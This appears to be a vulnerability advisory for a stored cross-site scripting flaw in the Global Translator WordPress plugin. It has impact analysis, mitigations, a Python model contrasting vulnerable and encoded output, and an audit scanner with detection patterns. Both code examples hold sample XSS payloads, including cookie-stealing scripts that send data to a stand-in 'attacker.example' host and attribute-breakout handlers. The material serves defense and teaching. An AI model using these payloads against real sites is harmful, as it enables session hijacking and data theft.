CVE-2025-30630: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in pozzad Global Translator
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in pozzad Global Translator allows Stored XSS. This issue affects Global Translator: from n/a through 2.0.2.
AI Analysis
Technical Summary
CVE-2025-30630 is a medium-severity stored cross-site scripting (XSS) vulnerability, classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), in the pozzad Global Translator WordPress plugin. It affects every version through 2.0.2; no earliest affected version is recorded. Stored XSS arises when the application persists attacker-controlled input (here, values saved through the plugin) and later writes it into a page without output encoding, so the browser of anyone who views that page runs the injected JavaScript with that viewer's session. The CVSS 3.1 base score is 5.9 (medium): network attack vector, low attack complexity, privileges required, user interaction required, scope changed, and low confidentiality, integrity and availability impact. A 5.9 with those metrics corresponds to the high-privileges (PR:H) variant of the usual stored-XSS vector, so the attacker needs an account with elevated access to the plugin's settings rather than an ordinary login. "Scope changed" does not mean that several services are affected: for XSS it records that the vulnerable component (the web application) and the impacted component (the victim's browser) fall under different security authorities. In practice the injected script can read what the victim can see, act on the site as the victim, or deface or break the page for them. No public exploit is known and no fixed release is linked at the time of writing, so operators should track the vendor and apply interim mitigations. The CVE was reserved on 24 March 2025 and published on 6 June 2025.
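The store-then-render pattern described above, as an added Python model. It is not the plugin's code (which is PHP); the payloads, markup and function names are constructed for illustration. Beyond the summary, it shows why a blocklist that strips script tags is not a fix, and it uses a real HTML parser rather than string matching to decide whether rendered markup still carries script, so correctly encoded text is not reported as a hit.

```python
"""Model of the stored-XSS pattern in the advisory. Added example: it is not the
plugin's (PHP) code, and the payloads, markup and function names are constructed
for illustration. The arguments stand in for values read back from storage."""
import html
import re
from html.parser import HTMLParser

# Constructed attacker inputs, not the payload from the real CVE.
PAYLOAD_BODY = ('<script>document.location="https://attacker.example/?c="'
                '+document.cookie</script>')
PAYLOAD_ATTR = '" autofocus onfocus="alert(document.domain)'
PAYLOAD_NO_SCRIPT_TAG = '<img src=x onerror=alert(1)>'


def render_vulnerable(label, title_attr):
    """Writes stored strings into HTML with no output encoding (CWE-79)."""
    return f'<div title="{title_attr}">{label}</div>'


def render_hardened(label, title_attr):
    """Encodes each value for the context it lands in. quote=True also escapes
    the quote characters that let a value break out of a quoted attribute;
    this is only sufficient because the attribute value is quoted."""
    return (f'<div title="{html.escape(title_attr, quote=True)}">'
            f'{html.escape(label, quote=True)}</div>')


_SCRIPT_TAG = re.compile(r'<\s*/?\s*script[^>]*>', re.IGNORECASE)


def render_blocklisted(label, title_attr):
    """A tempting but wrong fix: strip <script> tags and emit the rest raw.
    Event-handler attributes and attribute break-outs pass straight through."""
    return render_vulnerable(_SCRIPT_TAG.sub('', label),
                             _SCRIPT_TAG.sub('', title_attr))


class _ActiveContentFinder(HTMLParser):
    """Collects places where parsed markup would run script: <script> elements,
    on* event-handler attributes and javascript: URIs in URL attributes."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag == 'script':
            self.hits.append('script tag')
        for name, value in attrs:
            if name.startswith('on'):
                self.hits.append(f'{tag}@{name}')
            elif (name in ('href', 'src', 'action') and value
                  and value.strip().lower().startswith('javascript:')):
                self.hits.append(f'{tag}@{name}=javascript:')


def active_content(markup):
    """Parse markup the way a browser would (tag vs. text) and report script
    hooks. Escaped text never becomes a tag, so a correct encoder yields []."""
    finder = _ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return finder.hits


if __name__ == '__main__':
    cases = ((PAYLOAD_BODY, 'flag'), ('Hello', PAYLOAD_ATTR),
             (PAYLOAD_NO_SCRIPT_TAG, 'flag'))
    for name, fn in (('vulnerable', render_vulnerable),
                     ('blocklisted', render_blocklisted),
                     ('hardened', render_hardened)):
        for label, attr in cases:
            print(f'{name:12} {active_content(fn(label, attr))}')
```

The blocklisted renderer removes the script element from the first payload yet still reports hits for the other two, which is the usual way such filters fail. In WordPress the counterpart of html.escape(..., quote=True) at the point of output is esc_html() for text and esc_attr() inside quoted attributes; URL attributes additionally need esc_url(), which rejects the javascript: scheme.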
Potential Impact
For European organizations running Global Translator, the risk is to the integrity of the site and to the sessions of the privileged users who view the affected page. A stored payload fires every time such a user loads it, so it can act on the site as that user, exfiltrate what the dashboard shows, or plant further changes such as new administrator accounts or altered translations served to visitors. Where the plugin translates customer-facing or internal communications, tampered output and leaked content carry regulatory consequences under GDPR as well as reputational ones. The privilege requirement narrows the attack surface to accounts that already hold elevated access, so the realistic scenarios are a compromised or malicious privileged account, or a deployment in which a lower role has been granted access to the relevant settings. One caveat: on a single-site WordPress install administrators already hold the unfiltered_html capability and can publish script legitimately, so the finding adds little there; it matters more on multisite, where that capability is reserved for super administrators, and wherever a lesser role can reach the affected setting. The scope change in the CVSS vector reflects the browser being the impacted component, not a chain into other services. No in-the-wild exploitation has been reported, which lowers urgency but not the need to act.
Mitigation Recommendations
1. Limit who can reach the plugin's settings: keep administrator and similarly privileged accounts to a minimum, review them for stale or shared logins, and restrict wp-admin access to trusted networks or a VPN where the organization's workflow allows it.
2. The actual fix is output encoding in the plugin (for example WordPress's esc_html(), esc_attr() and esc_url() at the point of output, with sanitization on save); only the vendor or a maintained fork can apply it. Do not rely on stripping script tags from input, since event-handler attributes and attribute break-outs bypass such filters.
3. Deploy a Content Security Policy to reduce the impact of any injected script. Start in report-only mode: WordPress admin pages depend on inline scripts, so an enforcing policy without nonces or hashes will break the dashboard.
4. Audit stored plugin settings for script tags, event-handler attributes and javascript: URIs, and monitor web server logs for POST requests to the plugin's settings pages from unexpected accounts, addresses or times.
5. No fixed release is linked yet. Watch the vendor and Patchstack advisories and update as soon as a patched version appears; if the plugin turns out to be unmaintained, plan to deactivate and remove it.
6. Train privileged users to recognise phishing and credential-theft attempts, since a compromised privileged account is the most likely route to exploitation.
7. A web application firewall with XSS rules raises the bar but is bypassable through encoding tricks; treat it as defense in depth, not as the fix.
8. Harden authentication for privileged accounts (multi-factor authentication, strong unique passwords, login-attempt limits) so that the privilege requirement remains a real barrier.
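The audit in step 4, as an added Python helper that is not part of the advisory or the plugin. It scans stored option values for payloads that would run if written to a page without encoding, peeling off URL- and entity-encoding first so that disguised values are seen in the form a browser would parse. The rows are constructed to resemble exported WordPress option rows and the option names are invented.

```python
"""Audit helper for stored plugin settings. Added example, not part of the
advisory or the plugin: the sample rows and option names are constructed."""
import html
import re
from urllib.parse import unquote

# Constructed sample rows: (option_name, option_value). Names are hypothetical.
SAMPLE_ROWS = [
    ("gt_site_title", "My Company"),
    ("gt_footer_text", 'Translated by <a href="https://example.org">Example</a>'),
    ("gt_flag_alt", 'x" onmouseover="alert(document.cookie)'),
    ("gt_custom_css",
     "%3Cscript%3Efetch('https://attacker.example/?c='%2Bdocument.cookie)%3C/script%3E"),
    ("gt_welcome", "&lt;img src=x onerror=alert(1)&gt;"),
    ("gt_link", "JaVaScRiPt:alert(1)"),
]

# Ordered: the first matching indicator is reported as the reason.
_INDICATORS = [
    ("script tag", re.compile(r"<\s*script\b", re.I)),
    ("event handler attribute", re.compile(r"""[\s"'/]on[a-z]+\s*=""", re.I)),
    ("javascript: URI", re.compile(r"javascript\s*:", re.I)),
    ("active element", re.compile(r"<\s*(iframe|object|embed|svg|math)\b", re.I)),
]


def normalise(value, rounds=3):
    """Peel off layers of URL- and entity-encoding so the indicators see the
    form a browser would end up parsing. Bounded so crafted input cannot
    loop forever."""
    for _ in range(rounds):
        decoded = html.unescape(unquote(value))
        if decoded == value:
            break
        value = decoded
    return value


def scan_rows(rows):
    """Return (option_name, reason) for each value that carries an indicator.
    Findings are leads for manual review, not proof of compromise: ordinary
    HTML such as a plain link passes, but unusual text can still trip a rule.
    Entity-encoded payloads are reported too, because a plugin that decodes
    before output would revive them."""
    findings = []
    for name, value in rows:
        text = normalise(value)
        for reason, pattern in _INDICATORS:
            if pattern.search(text):
                findings.append((name, reason))
                break
    return findings


if __name__ == "__main__":
    for name, reason in scan_rows(SAMPLE_ROWS):
        print(f"{name}: {reason}")
```

On a live site the rows can be exported with WP-CLI, for instance `wp option list --search='gt_*' --format=csv` (the prefix is hypothetical), and the same scan applied to any translation cache tables the plugin writes. Review each finding by hand before treating it as an incident, and when one is confirmed, pull the access log for the request that saved the value to identify the account that planted it.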
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland
Technical Details
- Data Version: 5.1
- Assigner Short Name: Patchstack
- Date Reserved: 2025-03-24T13:01:06.201Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 6842eddb71f4d251b5c87f97
Added to database: 6/6/2025, 1:32:11 PM
Last enriched: 7/8/2025, 6:41:37 AM
Last updated: 8/3/2025, 4:24:17 AM